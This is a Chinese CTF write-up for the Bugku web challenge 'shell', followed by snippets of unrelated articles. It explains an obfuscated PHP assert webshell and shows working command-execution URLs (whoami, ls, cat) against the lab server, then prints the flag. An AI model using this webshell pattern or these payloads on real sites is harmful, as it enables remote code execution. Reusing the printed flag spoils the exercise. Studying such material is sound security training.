BUGKU-WEB shell
题目描述
题目截图如下:
描述:
$poc = "a#s#s#e#r#t";$poc_1 = explode("#", $poc);$poc_2 = $poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];$poc_2($_GET['s'])
进入场景看看:是一个空白的界面
解题思路
- 代码审计
相关工具
- 无
解题步骤
- 审计提示中的代码
$poc = "a#s#s#e#r#t"; # 定义了一个名为POC的变量$poc_1 = explode("#", $poc); # 使用了PHP中的ecplode函数,作用是按照指定的分割符#对变量字符串进行分割,分割后是一个数组$poc_2 = $poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; # 将分割后的数组内容进行拼接,显然是一个单词assert$poc_2($_GET['s'])# 将拼接后的字符串 $poc_2 作为函数名,也就是assert()函数# $_GET[] 表示使用的是get请求,传入一个名为s的参数,然后将这个参数值作为assert函数的内容
- 得到初步的POC:
http://114.67.175.224:17986/?s=
然后简单测试一下system函数进行输出:
http://114.67.175.224:17986/?s=system(%22whoami%22)
执行成功,然后就是找flag,怎么知道flag在哪里呢?当然是先遍历一下,也就是ls:
http://114.67.175.224:17986/?s=system(ls)
发现2个文件,其中一个直接显示flag的txt文件,那就是它了,如何显示这个文件的内容呢?直接访问就可以啦
http://114.67.175.224:17986/flaga15808abee46a1d5.txt
也可以直接使用cat命令访问:
http://114.67.175.224:17986/?s=system(%22cat%20flaga15808abee46a1d5.txt%22)
除此外,还可以使用
得到Flag
flag{dcad944287da8b741c17bcf4263149e8}
新知识点
- PHP explode() 函数
- assert()函数:直接将传入的参数当成PHP代码直接执行
参考链接
- php assert执行命令,php中代码执行&&命令执行函数
- Bugku-CTF-shell-过狗一句话
有用的话,请
点赞收藏评论,帮助更多的同学哦
相关文章:
BUGKU-WEB shell
题目描述 题目截图如下: 描述: $poc "a#s#s#e#r#t";$poc_1 explode("#", $poc);$poc_2 $poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];$poc_2($_GET[s])进入场景看看:是一个空白的界面 解题思路 …...
系统重构后,对项目定制开发的兼容性问题
公司自实施产品线战略以来,基本推翻了全部旧有业务模块。后续以标准产品二次开发的模式进行项目开发。但在涉及到一些旧有系统二期、三期升级改造过程中。不可避免的需要解决旧有系统的客户定制化开发兼容性问题。也就是旧有系统定制开发的模块不能丢弃。重新开发从…...
Linux---基本操作命令之用户管理命令
1.1useradd 添加新用户 root用户:/root 普通用户:/home/ 创建的用户还是david,只是在dave文件夹下 1.2 passwd 设置密码 给用户tony设置密码: 123456 1.3 id 查看用户是否存在 查看有没有这个用户:id 名字 gid:用…...
excel 破解 保护工作簿及保护工作表
excel 破解 保护工作簿及保护工作表 对于这种 保护工作簿及保护工作表 不知道密码时,可以使用以下方法破解 保护工作簿破解 打开受保存的excel 右键点击sheet名称 —> 查看代码 复制以下代码,粘贴到代码区域 Sub 工作簿密码破解() ActiveWorkbook.…...
django-comment-migrate 模型注释的使用
django-comment-migrate 的使用 django-comment-migrate 是一个 Django 应用,用于将模型注释自动迁移到数据库表注释中。它可以帮助您保持数据库表注释与模型定义的一致性,并提高代码的可读性。 安装 要使用 django-comment-migrate,您需要…...
Python学习:列表
Python 列表概念 在Python中,列表(List)是一种有序、可变、允许重复元素的数据结构。列表使用方括号 []来表示,可以包含任意类型的元素,如整数、字符串、列表等。 Python 访问列表中的值 在Python中࿰…...
C语言每日一题—判断是否为魔方矩阵
魔方矩阵 在魔方阵中,所有的行、列和对角线都拥有相同的和。例如:17 24 1 8 15 23 5 7 14 16 4 9 24 6 13 20 22 和 3 5 710 12 19 21 3 8 1 611 18 25 2 9 写一个程序读入一个二维整型数组并…...
Java数组新手冷知识
J a v a Java Java 中,数组是对象,当你将一个数组传递给方法时,你其实是传递了数组的引用(地址),而不是数组的副本。因此,在 m m m 方法中修改了数组 n n n 的内容后,这种改变在方…...
Linux——程序地址空间
我们先来看这样一段代码: #include <stdio.h> #include <unistd.h> #include <stdlib.h>int g_val 0;int main() {pid_t id fork();if(id < 0){perror("fork");return 0;}else if(id 0){ //child,子进程肯定先跑完,也…...
Linux编程4.9 网络编程-建立连接
1、TCP的连接与断开 三次握手与四次挥手 2、服务器端并发性处理 2.1 多进程模型 一个父进程,多个子进程父进程负责等待并接受客户端连接子进程: 完成通信,接受一个客户端连接,就创建一个子进程用于通信。 2.2 多线程模型 多线程服务器是…...
威胁检测与分析--云图大师
威胁检测与分析--云图大师 当 Internet 在 1960 年代创建时,被设想为一个革命性的计算机网络,供几千名研究人员使用。创建这个快速可靠的网络使用了许多资源,其开发人员考虑的安全措施主要是为了防止军事威胁和潜在的强大入侵者。 在那个时代…...
Python基础入门 --- 7.函数
Python基础入门 第七章: 7.函数 7.1 函数多返回值 按照返回值顺序,写对应顺序的多个变量接收,变量之间用逗号分隔,支持不同数据类型return def test_return():return 1,"hello", Truex, y, z test_return() print…...
第4周 Python程序流程控制刷题
单击题目,直接跳转到页面刷题,一周后公布答案。 B2050:三角形判断B2037:奇偶数判断B2039:整数大小比较P5711:闰年判断P5714:肥胖问题B2043:判断能否被 3,5,7…...
高亮搜索中的关键字怎么实现
在前端实现搜索关键字高亮,通常涉及到对页面上的文本内容进行操作,并使用CSS来改变这些内容的样式。以下是一个基本的步骤和示例,说明如何实现这一功能: HTML结构:首先,你需要在HTML中设置一个搜索框和一个…...
OpenCV系列文章目录(持续更新中......)
引言: OpenCV是一个开源的计算机视觉库,由英特尔公司开发并开源的一组跨平台的C函数和少量的C函数组成,用于实时图像处理、计算机视觉和机器学习等应用领域。OpenCV可以在包括Windows、Linux、macOS等各种操作系统平台上使用,具…...
【机器学习系列】M3DM工业缺陷检测部署与训练
一.基础资料 1.Git 地址 地址 2.issues issues 3.参考 参考 csdn 二.服务器信息 1.GPU 服务器 GPU 服务器自带 CUDA 安装(前提是需要勾选上)CUDA 需要选择大于 11.3 的版本登录服务器后会自动安装 GPU 驱动 2.CUDA 安装 GPU 服务器自带 CUDA CUDA 版本查看 3.登录信…...
西瓜书机器学习AUC与ℓ-rank(loss)的联系理解以及证明(通俗易懂)
前言 在学习到这部分时,对 ℓ-rank 以及AUC的关系难以理解透彻,在网上看到其他博主也并未弄明白,大家大多写自己的理解,我希望您在看完这篇文章时能够深刻理解这二者的关系,如果我的理解有误,希望您在评论…...
渔业安全生产综合管理指挥系统-航迹数据优化方案
文章目录 引言I 轨迹数据模型II 轨迹信息索引III 数据同步方案3.1 多服务器多表同步3.2 增量数据同步3.3 执行IV 配置ESV 团队建设5.1 前端(web GIS)5.2 后端(Java)see also引言 背景: 目前系统查询轨迹数据比较慢的原因是没有进行读写分离,轨迹数据的查询和写入都是SQL…...
发现数据之美:探索数据可视化的艺术与技术
摘要: 数据可视化是将抽象的数据转化为图形化表达的过程,它不仅可以让数据更加直观易懂,还能够揭示数据背后的模式、趋势和关联关系。本文将深入探讨数据可视化的重要性,并通过详细的实例演示如何运用常见的数据可视化工具和库,如Matplotlib、Seaborn和Plotly,为读者呈现…...
Flutter项目组件模块化开发的实践与搭建
在Flutter应用程序的开发中,组件模块化是一种非常重要的开发方式,它可以提高代码的可维护性、复用性和扩展性。本文将介绍如何在Flutter项目中搭建组件模块化开发的框架,并给出实际的实践示例。 1. 为什么需要组件模块化开发? 在…...
玄机靶场:供应链安全-供应链应急-Part2 通关笔记
供应链安全-供应链应急-Part2 通关笔记 题目背景 本题是供应链安全应急响应的第二部分,主要考察对Gitea代码仓库和Jenkins持续集成环境的综合分析能力。黑客通过某种手段获取了开发者的Gitea Token,进而对多个代码仓库进行了恶意篡改,并在J…...
如何快速解密QQ音乐加密格式:qmcdump音频解密终极指南
如何快速解密QQ音乐加密格式:qmcdump音频解密终极指南 【免费下载链接】qmcdump 一个简单的QQ音乐解码(qmcflac/qmc0/qmc3 转 flac/mp3),仅为个人学习参考用。 项目地址: https://gitcode.com/gh_mirrors/qm/qmcdump 你是否…...
)
Elasticsearch实用技巧:列出集群所有索引的5种方法(最全命令+图解)
Elasticsearch实用技巧:列出集群所有索引的5种方法(最全命令图解)一、前言二、核心说明:查看索引的通用规则三、索引查看整体流程四、方法1:最常用 —— 查看所有索引(带表头,推荐)4…...
FreeRTOS堆内存监控实战:用xPortGetFreeHeapSize优化你的STM32项目内存分配
FreeRTOS堆内存监控实战:用xPortGetFreeHeapSize优化你的STM32项目内存分配 在嵌入式系统开发中,内存管理往往是决定项目成败的关键因素之一。对于使用STM32等资源受限微控制器的工程师来说,如何在有限的RAM中平衡性能和稳定性,是…...
)
从刷题到实战:一文搞懂C/C++进制转换(含itoa、strtol、bitset函数避坑指南)
从刷题到实战:C/C进制转换全攻略与避坑指南 引言:为什么进制转换如此重要? 记得第一次参加技术面试时,面试官抛出一道看似简单的题目:"如何将十六进制的颜色代码转换为RGB值?"当时手忙脚乱的样子…...
别急着改java.security!排查JDBC连SQL Server报TLS错误的3个更优思路
别急着改java.security!排查JDBC连SQL Server报TLS错误的3个更优思路 当你在使用JDBC连接SQL Server时遇到"The server selected protocol version TLS10 is not accepted by client preferences"的错误,大多数技术文章会直接建议你修改java.s…...
别再手算拉普拉斯变换了!用Matlab的laplace/ilaplace函数5分钟搞定信号分析
别再手算拉普拉斯变换了!用Matlab的laplace/ilaplace函数5分钟搞定信号分析 信号与系统课程里最让人头疼的作业是什么?十有八九会有人提到拉普拉斯变换。那些冗长的积分公式、复杂的收敛域分析,以及稍不留神就会出错的代数运算,简…...
论文“瘦身”新纪元:书匠策AI,一键解锁降重降AIGC的双重秘籍!
在学术圈的“健身房”里,每篇论文都是一位亟待“塑形”的运动员。它们渴望以最精炼、最原创的姿态,在查重的“体脂秤”上展现出完美的“身材比例”。但现实往往不尽如人意,高重复率、AIGC痕迹过重,成了许多论文“健身”路上的绊脚…...
如何在Windows上实现macOS风格三指拖拽:ThreeFingerDragOnWindows终极指南
如何在Windows上实现macOS风格三指拖拽:ThreeFingerDragOnWindows终极指南 【免费下载链接】ThreeFingersDragOnWindows Enables macOS-style three-finger dragging functionality on Windows Precision touchpads. 项目地址: https://gitcode.com/gh_mirrors/th…...
5分钟上手League Akari:英雄联盟玩家的终极智能助手指南
5分钟上手League Akari:英雄联盟玩家的终极智能助手指南 【免费下载链接】League-Toolkit An all-in-one toolkit for LeagueClient. Gathering power 🚀. 项目地址: https://gitcode.com/gh_mirrors/le/League-Toolkit 还在为繁琐的游戏操作而烦…...